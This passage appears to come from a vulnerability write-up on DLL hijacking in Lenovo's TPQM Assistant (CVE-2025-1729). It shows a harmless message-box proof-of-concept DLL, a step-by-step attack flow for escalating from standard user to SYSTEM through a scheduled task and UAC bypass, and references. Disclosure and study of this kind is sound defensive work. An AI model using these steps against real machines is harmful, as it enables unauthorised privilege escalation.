    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Payload: display a message box (proof-of-concept)
        MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
    }
    return TRUE;
}
Attack Flow
- As a standard user, drop hostfxr.dll into C:\ProgramData\Lenovo\TPQM\Assistant\.
- Wait for the scheduled task to run at 9:30 AM in the current user's context.
- If an administrator is logged in when the task runs, the malicious DLL runs in the administrator's session at medium integrity.
- Chain standard UAC bypass techniques to elevate from medium integrity to SYSTEM privileges.
References
- CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
- Microsoft Store - TPQM Assistant UWP
- https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
- https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
- Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
- TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
- PoC – api0cradle/Narrator-dll
- Sysinternals Process Monitor